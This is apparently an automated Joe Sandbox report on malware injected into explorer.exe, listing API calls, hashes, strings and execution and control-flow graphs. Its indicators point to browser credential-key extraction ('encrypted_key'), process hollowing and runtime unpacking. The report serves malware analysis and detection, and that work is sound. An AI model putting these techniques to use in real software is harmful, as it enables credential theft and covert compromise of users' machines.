                                                                                                                                                    • Instruction ID: f6725d1760452f5477ee356a59d54e40ef68be29d7755b66cb2d44aef0db5c89
                                                                                                                                                    • Opcode Fuzzy Hash: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                                                                                                                                    • Instruction Fuzzy Hash: DA318D715083849FD770DF60D840B8FBBE9AF95344F00892EF98997252EB719548CBA3
                                                                                                                                                    APIs
                                                                                                                                                    • lstrlenW.KERNEL32(00000000,00000000,?,00122E75,PathToExe,00000000,00000000), ref: 00121BCC
                                                                                                                                                    • StrStrIW.SHLWAPI(00000000,.exe), ref: 00121BF0
                                                                                                                                                    • StrRChrIW.SHLWAPI(00000000,00000000,0000005C), ref: 00121C05
                                                                                                                                                    • lstrlenW.KERNEL32(00000000,?,00122E75,PathToExe,00000000,00000000), ref: 00121C1C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrlen
                                                                                                                                                    • String ID: .exe
                                                                                                                                                    • API String ID: 1659193697-4119554291
                                                                                                                                                    • Opcode ID: 9210a58b720568c28dd122c2993e7b61c22023398846e9d7d05157b71fa2f166
                                                                                                                                                    • Instruction ID: c1a20baa58ececb03c1e3d6fd4d198567ff1b43fa20b3b6a049e0becf43f25d2
                                                                                                                                                    • Opcode Fuzzy Hash: 9210a58b720568c28dd122c2993e7b61c22023398846e9d7d05157b71fa2f166
                                                                                                                                                    • Instruction Fuzzy Hash: 26F06239350631AAD734AF34BC49ABB62B4EF55341720486AF14AC31A1EB608DE1C759
                                                                                                                                                    APIs
                                                                                                                                                    • _allmul.NTDLL(?,00000000,00000018), ref: 0013316F
                                                                                                                                                    • _allmul.NTDLL(-00000001,00000000,?,?), ref: 001331D2
                                                                                                                                                    • _alldiv.NTDLL(?,?,00000000), ref: 001332DE
                                                                                                                                                    • _allmul.NTDLL(00000000,?,00000000), ref: 001332E7
                                                                                                                                                    • _allmul.NTDLL(?,00000000,?,?), ref: 00133392
                                                                                                                                                      • Part of subcall function 001316CD: memset.NTDLL ref: 0013172B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _allmul$_alldivmemset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3880648599-0
                                                                                                                                                    • Opcode ID: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                                                                                                                                    • Instruction ID: c1360e207e7a093ea73f34ef226b8071d862bfe1a99ddcf08a635daf409fa4e5
                                                                                                                                                    • Opcode Fuzzy Hash: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                                                                                                                                    • Instruction Fuzzy Hash: 32D1B771A083418BDB28DF69C480B6FBBE1BF98704F14882DF9A593251DB70DE45CB86
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: FOREIGN KEY constraint failed$new$old
                                                                                                                                                    • API String ID: 0-384346570
                                                                                                                                                    • Opcode ID: e518b2cebd79bbfa3fa2473f93ac04ef4681b373322204f31caa9f22c179649e
                                                                                                                                                    • Instruction ID: 077dcc527395c596f1bb502bbe4c294de882ccd66031e4f6d3f14a0fa37bb126
                                                                                                                                                    • Opcode Fuzzy Hash: e518b2cebd79bbfa3fa2473f93ac04ef4681b373322204f31caa9f22c179649e
                                                                                                                                                    • Instruction Fuzzy Hash: AFD156B07483009FD714DF24C881B2EBBE9AF98740F50881EF9999B291DB70D846CB92
                                                                                                                                                    APIs
                                                                                                                                                    • _alldiv.NTDLL(000000FF,7FFFFFFF,?,?), ref: 001296E7
                                                                                                                                                    • _alldiv.NTDLL(00000000,80000000,?,?), ref: 00129707
                                                                                                                                                    • _alldiv.NTDLL(00000000,80000000,?,?), ref: 00129739
                                                                                                                                                    • _alldiv.NTDLL(00000001,80000000,?,?), ref: 0012976C
                                                                                                                                                    • _allmul.NTDLL(?,?,?,?), ref: 00129798
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _alldiv$_allmul
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4215241517-0
                                                                                                                                                    • Opcode ID: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                                                                                                                                    • Instruction ID: 1f9645abbb91da25c9230892bac163fdfa379b510ef6701750ec3f528e0a6ab1
                                                                                                                                                    • Opcode Fuzzy Hash: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                                                                                                                                    • Instruction Fuzzy Hash: 542138325287752BE7345E5D7CC0B2B76D9CBB5790F25413EFD0AC2251EBA28C7088A1
                                                                                                                                                    APIs
                                                                                                                                                    • _allmul.NTDLL(?,00000000,00000000), ref: 0013B1B3
                                                                                                                                                    • _alldvrm.NTDLL(?,?,00000000), ref: 0013B20F
                                                                                                                                                    • _allrem.NTDLL(?,00000000,?,?), ref: 0013B28A
                                                                                                                                                    • memcpy.NTDLL(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00000000), ref: 0013B298
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _alldvrm_allmul_allremmemcpy
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1484705121-0
                                                                                                                                                    • Opcode ID: e8afa76b6a191bd5df26c5ea9e4fbff8cffe4eab91b4adbab092f8e8b774ce46
                                                                                                                                                    • Instruction ID: d1b9224c79cd985a417d061612c15970efdffde62f932893ba9ae686fc22fd02
                                                                                                                                                    • Opcode Fuzzy Hash: e8afa76b6a191bd5df26c5ea9e4fbff8cffe4eab91b4adbab092f8e8b774ce46
                                                                                                                                                    • Instruction Fuzzy Hash: 4F4119756083419FC718EF29C89192FB7E6AFD8700F04892DF99987262EB31ED45CB52
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _alldiv_allmul
                                                                                                                                                    • String ID: winTruncate1$winTruncate2
                                                                                                                                                    • API String ID: 727729158-470713972
                                                                                                                                                    • Opcode ID: cab426efa7d33a58d08310be84249bec32cd8c674442d42f4568dae04c062f42
                                                                                                                                                    • Instruction ID: 294d4fa63652aea691d66a295eb8f7456f1520d0dbc4ae78b3e84474cedd6cad
                                                                                                                                                    • Opcode Fuzzy Hash: cab426efa7d33a58d08310be84249bec32cd8c674442d42f4568dae04c062f42
                                                                                                                                                    • Instruction Fuzzy Hash: 0021FF32201220ABCB148F29DC85EA777BEEF94310F958129FD14CB295D732DC20CBA6
                                                                                                                                                    APIs
                                                                                                                                                    • GetHGlobalFromStream.OLE32(?,?), ref: 001218A7
                                                                                                                                                    • GlobalLock.KERNEL32(00124B57), ref: 001218B6
                                                                                                                                                    • GlobalUnlock.KERNEL32(?), ref: 001218F4
                                                                                                                                                      • Part of subcall function 00121000: GetProcessHeap.KERNEL32(00000008,?,001211C7,?,?,00000001,00000000,?), ref: 00121003
                                                                                                                                                      • Part of subcall function 00121000: RtlAllocateHeap.NTDLL(00000000), ref: 0012100A
                                                                                                                                                    • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 001218E8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Global$Heap$AllocateFromLockMemoryMoveProcessStreamUnlock
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1688112647-0
                                                                                                                                                    • Opcode ID: 321c07226e5a932eda708dcb50d822ddbf7d69b0a0bb832d21db7543c5a788a4
                                                                                                                                                    • Instruction ID: da2112c54b4f438fc3ffa6fd5d248563a196dfdb36036afe7644140c2d710537
                                                                                                                                                    • Opcode Fuzzy Hash: 321c07226e5a932eda708dcb50d822ddbf7d69b0a0bb832d21db7543c5a788a4
                                                                                                                                                    • Instruction Fuzzy Hash: B0016D75204726BF8B019F25AC5889F7BBAEFA4351B10843AF94583221DF31C9A49A60
                                                                                                                                                    APIs
                                                                                                                                                    • lstrlenW.KERNEL32(?,00000000,00000000,?,?,00122F0C), ref: 00121973
                                                                                                                                                    • lstrlenW.KERNEL32(00176564,?,?,00122F0C), ref: 00121978
                                                                                                                                                    • lstrcatW.KERNEL32(00000000,?), ref: 00121990
                                                                                                                                                    • lstrcatW.KERNEL32(00000000,00176564), ref: 00121994
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrcatlstrlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1475610065-0
                                                                                                                                                    • Opcode ID: 69968d250d5c70ddc4b31bf13f0b8a5616b385da8700e5acb47555b40a8d1344
                                                                                                                                                    • Instruction ID: c5f9fee2449280e7e681a8355b357f3ba1b105822b06db455623ae386d7a96c4
                                                                                                                                                    • Opcode Fuzzy Hash: 69968d250d5c70ddc4b31bf13f0b8a5616b385da8700e5acb47555b40a8d1344
                                                                                                                                                    • Instruction Fuzzy Hash: EDE0656230022C2B4714B7AE6C94D7B76ACCAD96A53150039FA0CD3202EA569C4586B0
                                                                                                                                                    APIs
                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,"encrypted_key":"), ref: 00122FC1
                                                                                                                                                    • lstrlen.KERNEL32("encrypted_key":",?,00123FA8), ref: 00122FCE
                                                                                                                                                    • StrStrIA.SHLWAPI("encrypted_key":",0017692C), ref: 00122FDD
                                                                                                                                                      • Part of subcall function 0012190B: lstrlen.KERNEL32(?,?,?,?,00000000,00122783), ref: 0012192B
                                                                                                                                                      • Part of subcall function 0012190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,00122783), ref: 00121930
                                                                                                                                                      • Part of subcall function 0012190B: lstrcat.KERNEL32(00000000,?), ref: 00121946
                                                                                                                                                      • Part of subcall function 0012190B: lstrcat.KERNEL32(00000000,00000000), ref: 0012194A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrlen$lstrcat
                                                                                                                                                    • String ID: "encrypted_key":"
                                                                                                                                                    • API String ID: 493641738-877455259
                                                                                                                                                    • Opcode ID: 12ee1f42866cb4a47a7051f69b3a52b53340d10c88f14970b3b774fa68d2d564
                                                                                                                                                    • Instruction ID: 46cd038ca4e291dbc2732615dbd1f092c7e8d4548bd1ff0902b731dd0ea388b1
                                                                                                                                                    • Opcode Fuzzy Hash: 12ee1f42866cb4a47a7051f69b3a52b53340d10c88f14970b3b774fa68d2d564
                                                                                                                                                    • Instruction Fuzzy Hash: FAE0222260AE342F8321ABB52C48C4B3E38AF422143440078F20993552EFA28881C6E0
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00126A81: memset.NTDLL ref: 00126A9C
                                                                                                                                                    • _aulldiv.NTDLL(?,00000000,?,00000000), ref: 0014F2A1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _aulldivmemset
                                                                                                                                                    • String ID: %llu$%llu
                                                                                                                                                    • API String ID: 714058258-4283164361
                                                                                                                                                    • Opcode ID: fcc4dfce769dcaf7f1898430cda3a895465dbd3417c25f8c502c625f52e68ebe
                                                                                                                                                    • Instruction ID: b23578dc4f3e1cdd42b1ae4ef3bae76053d6e2703d048f3e963cb25449bd2441
                                                                                                                                                    • Opcode Fuzzy Hash: fcc4dfce769dcaf7f1898430cda3a895465dbd3417c25f8c502c625f52e68ebe
                                                                                                                                                    • Instruction Fuzzy Hash: 212105B2A446156BC711AA24CC42F6BB768EFA5730F04833CF925972D1DB61DC2687E1
                                                                                                                                                    APIs
                                                                                                                                                    • _allmul.NTDLL(?,00000000,?), ref: 00132174
                                                                                                                                                    • _allmul.NTDLL(?,?,?,00000000), ref: 0013220E
                                                                                                                                                    • _allmul.NTDLL(?,00000000,00000000,?), ref: 00132241
                                                                                                                                                    • _allmul.NTDLL(00122E26,00000000,?,?), ref: 00132295
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _allmul
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4029198491-0
                                                                                                                                                    • Opcode ID: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                                                                                                                    • Instruction ID: 498362382b6a5f676ce77189f7bfb1998c3ea86552248746f5378e3a129333b2
                                                                                                                                                    • Opcode Fuzzy Hash: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                                                                                                                    • Instruction Fuzzy Hash: CAA17B717087019FD714EF68C991A2FB7E6AFE8704F10482DF6969B291EB70EC458B42
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1297977491-0
                                                                                                                                                    • Opcode ID: 93531ae6043f475d782dde2bbd696ea544871cdeb419238af5712af0d196b23d
                                                                                                                                                    • Instruction ID: 44866eba16c7fa3b11abb013214e1e5da9857249930ac2e2dddaf5e4e79e5c60
                                                                                                                                                    • Opcode Fuzzy Hash: 93531ae6043f475d782dde2bbd696ea544871cdeb419238af5712af0d196b23d
                                                                                                                                                    • Instruction Fuzzy Hash: A9819DB160C3149FC364DF28C980A2BBBE5EF98714F15496DF88A97292E770E905CB91
                                                                                                                                                    APIs
                                                                                                                                                    • lstrlen.KERNEL32(?,?,?,?,00000000,00122783), ref: 0012192B
                                                                                                                                                    • lstrlen.KERNEL32(00000000,?,?,?,00000000,00122783), ref: 00121930
                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 00121946
                                                                                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0012194A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrcatlstrlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1475610065-0
                                                                                                                                                    • Opcode ID: 03a865de26843c26a50176dca791f3a6aad0fcd0c065122981fd5b0eea3ab98d
                                                                                                                                                    • Instruction ID: f86f308597aa028dfb808790f58d52b600baad8fcfc517a2ed84595e08a76ee4
                                                                                                                                                    • Opcode Fuzzy Hash: 03a865de26843c26a50176dca791f3a6aad0fcd0c065122981fd5b0eea3ab98d
                                                                                                                                                    • Instruction Fuzzy Hash: 71E09B5230062C2B4B20B7AE6C94D7B76ECDBE56A53050035F908D3202EF559C4586B0

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:9.3%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:55.1%
                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                    Total number of Nodes:49
                                                                                                                                                    Total number of Limit Nodes:2
                                                                                                                                                    execution_graph 950 637f4 951 63804 950->951 956 6372c 951->956 953 63809 955 63817 953->955 960 622b4 953->960 957 6375a 956->957 958 63777 RegCreateKeyExW 957->958 959 637bc 958->959 959->953 961 622d6 960->961 962 622c8 CreateStreamOnHGlobal 960->962 961->955 962->961 982 6a1e0 983 6a1e6 982->983 986 6a298 983->986 991 6a29d 986->991 987 6a385 LoadLibraryA 987->991 989 6a3e0 VirtualProtect VirtualProtect 990 6a46e 989->990 990->990 991->987 991->989 992 6a248 991->992 993 6a1af 994 6a1bd 993->994 995 6a298 3 API calls 994->995 996 6a1cf 994->996 995->996 963 6a298 968 6a29d 963->968 964 6a385 LoadLibraryA 964->968 966 6a3e0 VirtualProtect VirtualProtect 967 6a46e 966->967 967->967 968->964 968->966 969 6a3d5 968->969 970 63608 975 63458 970->975 972 6363b 973 63458 3 API calls 972->973 974 6365d 973->974 981 63484 975->981 976 63523 RegOpenKeyExW 977 635ef 976->977 980 6354d 976->980 977->972 978 635b5 RegEnumKeyExW 979 635e4 RegCloseKey 978->979 978->980 979->977 980->978 981->976 997 63668 998 63458 3 API calls 997->998 999 6369b 998->999 1000 63458 3 API calls 999->1000 1001 636bd 1000->1001 1002 6a1f9 1003 6a228 1002->1003 1005 6a248 1002->1005 1004 6a298 3 API calls 1003->1004 1004->1005

                                                                                                                                                    Callgraph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    • Opacity -> Relevance
                                                                                                                                                    • Disassembly available
                                                                                                                                                    callgraph 0 Function_00062E04 8 Function_00061B8C 0->8 42 Function_00061838 0->42 70 Function_00061860 0->70 1 Function_00061405 2 Function_00062700 10 Function_00062688 2->10 2->70 3 Function_00061000 4 Function_00061980 5 Function_0006B00C 6 Function_0006298C 7 Function_0006188C 7->42 8->42 9 Function_00063608 64 Function_00063458 9->64 10->42 11 Function_00062308 12 Function_00061508 13 Function_00062514 28 Function_000623A0 13->28 51 Function_0006234C 13->51 54 Function_00062354 13->54 71 Function_00062360 13->71 80 Function_000623F0 13->80 14 Function_00061B14 14->42 15 Function_00069912 16 Function_00069C92 17 Function_0006B192 18 Function_00061D10 18->42 83 Function_000618F8 18->83 19 Function_00062410 34 Function_000623AC 19->34 19->80 20 Function_00062610 20->42 21 Function_0006971C 22 Function_0006141D 23 Function_0006A298 63 Function_0006A25A 23->63 24 Function_00062498 24->34 47 Function_00062340 24->47 25 Function_000699A7 26 Function_000647A7 27 Function_00061822 29 Function_00061E20 29->4 29->7 29->18 29->42 46 Function_00061C40 29->46 61 Function_000618D0 29->61 68 Function_00061DE0 29->68 29->70 29->83 30 Function_000628A0 30->42 30->70 78 Function_00062774 30->78 31 Function_0006A1AF 31->23 32 Function_0006372C 32->42 32->70 33 Function_000622AC 35 Function_0006272C 36 Function_000630A8 36->2 36->10 36->35 36->36 36->70 82 Function_00062F7C 36->82 84 Function_00062AF8 36->84 37 Function_00069EB4 38 Function_000622B4 39 Function_000614B2 40 Function_00069930 41 Function_000638B0 41->41 41->42 55 Function_00061AD4 41->55 43 Function_00061938 44 Function_00062938 45 Function_00069FC2 48 Function_000629C0 48->10 49 Function_00062BC0 49->2 49->10 49->20 49->35 49->42 49->43 58 Function_00062A54 49->58 49->70 50 Function_000641CF 52 Function_00061A4C 53 Function_000636C8 53->14 66 Function_000621E4 53->66 53->70 74 Function_000618E8 53->74 56 Function_000614D4 57 Function_00061254 58->42 58->70 59 Function_00063254 59->6 59->10 59->35 59->36 59->42 59->44 59->70 60 Function_0006A055 62 Function_00069ADA 64->2 64->10 64->30 64->42 64->48 64->59 64->64 64->70 64->78 65 Function_000641D9 66->29 66->42 66->70 67 Function_0006A1E0 67->23 68->52 69 Function_00061560 70->55 72 Function_0006156C 73 Function_00062B6C 73->13 73->24 75 Function_000622E8 76 Function_00063668 76->64 77 Function_00061576 78->42 78->70 78->78 79 Function_000637F4 79->11 79->32 79->33 79->38 79->53 79->54 79->73 79->75 81 Function_00062570 79->81 80->34 81->28 81->42 81->54 82->0 82->49 82->58 82->70 85 Function_00062EF8 82->85 84->42 85->20 86 Function_00064178 87 Function_0006A1F9 87->23 88 Function_000614F9

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 108 638b0-63907 call 61ad4 call 61838 NtUnmapViewOfSection call 6388c 117 63911-6391a 108->117 118 63909-6390c call 638b0 108->118 118->117
                                                                                                                                                    APIs
                                                                                                                                                    • NtUnmapViewOfSection.NTDLL ref: 000638F2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000027.00000002.573648210.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_39_2_61000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: SectionUnmapView
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 498011366-0
                                                                                                                                                    • Opcode ID: 175f204f98ddab081ce75ab585c860cf335b3b36596ebe57e2ab61619d8d81c0
                                                                                                                                                    • Instruction ID: 07d7c0bebfd5eab35338b42f632c169550439883b7608d4425e9f1fe2b024cbe
                                                                                                                                                    • Opcode Fuzzy Hash: 175f204f98ddab081ce75ab585c860cf335b3b36596ebe57e2ab61619d8d81c0
                                                                                                                                                    • Instruction Fuzzy Hash: F3F0A020F11A080FEAAC77FD685D3A822C2EB59310F900629B516C36D3DC398A458352

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 0 6a298-6a29b 1 6a2a5-6a2a9 0->1 2 6a2b5 1->2 3 6a2ab-6a2b3 1->3 4 6a2b7 2->4 5 6a29d-6a2a3 2->5 3->2 6 6a2ba-6a2c1 4->6 5->1 8 6a2c3-6a2cb 6->8 9 6a2cd 6->9 8->9 9->6 10 6a2cf-6a2d2 9->10 11 6a2e7-6a2f4 10->11 12 6a2d4-6a2e2 10->12 22 6a2f6-6a2f8 11->22 23 6a30e-6a31c call 6a25a 11->23 13 6a2e4-6a2e5 12->13 14 6a31e-6a339 12->14 13->11 16 6a36a-6a36d 14->16 17 6a372-6a379 16->17 18 6a36f-6a370 16->18 21 6a37f-6a383 17->21 20 6a351-6a355 18->20 24 6a357-6a35a 20->24 25 6a33b-6a33e 20->25 26 6a385-6a39e LoadLibraryA 21->26 27 6a3e0-6a3e9 21->27 28 6a2fb-6a302 22->28 23->1 24->17 29 6a35c-6a360 24->29 25->17 33 6a340 25->33 32 6a39f-6a3a6 26->32 30 6a3ec-6a3f5 27->30 49 6a304-6a30a 28->49 50 6a30c 28->50 34 6a341-6a345 29->34 35 6a362-6a369 29->35 36 6a3f7-6a3f9 30->36 37 6a41a-6a46a VirtualProtect * 2 30->37 32->21 39 6a3a8 32->39 33->34 34->20 40 6a347-6a349 34->40 35->16 42 6a40c-6a418 36->42 43 6a3fb-6a40a 36->43 44 6a46e-6a473 37->44 45 6a3b4-6a3bc 39->45 46 6a3aa-6a3b2 39->46 40->20 48 6a34b-6a34f 40->48 42->43 43->30 44->44 51 6a475-6a484 44->51 47 6a3be-6a3ca 45->47 46->47 54 6a3d5-6a3df 47->54 55 6a3cc-6a3d3 47->55 48->20 48->24 49->50 50->23 50->28 55->32
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32 ref: 0006A397
                                                                                                                                                    • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 0006A441
                                                                                                                                                    • VirtualProtect.KERNELBASE ref: 0006A45F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000027.00000002.573648210.0000000000069000.00000040.80000000.00040000.00000000.sdmp, Offset: 00069000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_39_2_69000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 895956442-0
                                                                                                                                                    • Opcode ID: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                                                                                                                    • Instruction ID: 006bc09559ba58e1e56ca86166064d69eaa2f5b492dea585316237ca25ff1824
                                                                                                                                                    • Opcode Fuzzy Hash: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                                                                                                                    • Instruction Fuzzy Hash: 99517D3175892E4BCB24BB7C9CC42F5B3C3F757321B18062AD08AD3385D559D9468B93

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000027.00000002.573648210.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_39_2_61000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseEnumOpen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1332880857-0
                                                                                                                                                    • Opcode ID: e6d0cc022632efdd4a3c5a8daf3e56bcebce22f91e00e29876c625ce24938a9c
                                                                                                                                                    • Instruction ID: d4483960c43caaeea037d42a9e10a4b875f7596f5693c41f599e3ec46e3d9013
                                                                                                                                                    • Opcode Fuzzy Hash: e6d0cc022632efdd4a3c5a8daf3e56bcebce22f91e00e29876c625ce24938a9c
                                                                                                                                                    • Instruction Fuzzy Hash: 82416C30718F0C4FDB98EF6D94997AAB6E2FBD8341F04456EA14EC3262DE34D9448782

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 98 6372c-637ba call 61838 RegCreateKeyExW 102 637d6-637f0 call 61860 98->102 103 637bc-637cb 98->103 103->102 107 637cd-637d3 103->107 107->102
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000027.00000002.573648210.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_39_2_61000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Create
                                                                                                                                                    • String ID: ?
                                                                                                                                                    • API String ID: 2289755597-1684325040
                                                                                                                                                    • Opcode ID: 90b71b727ca288489aec266a13dd0a18d59c7ad321cf10e681fca41da4c5c652
                                                                                                                                                    • Instruction ID: 0175cadc1eaba084e880b185854f7669454e214051596b44bd1488a6f786bdce
                                                                                                                                                    • Opcode Fuzzy Hash: 90b71b727ca288489aec266a13dd0a18d59c7ad321cf10e681fca41da4c5c652
                                                                                                                                                    • Instruction Fuzzy Hash: 9E11B970608B4C8FD750DF69D48865AB7E2FB98305F40062EE489C3321DF34D985CB82

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 120 622b4-622c6 121 622d6-622e6 120->121 122 622c8-622d0 CreateStreamOnHGlobal 120->122 122->121
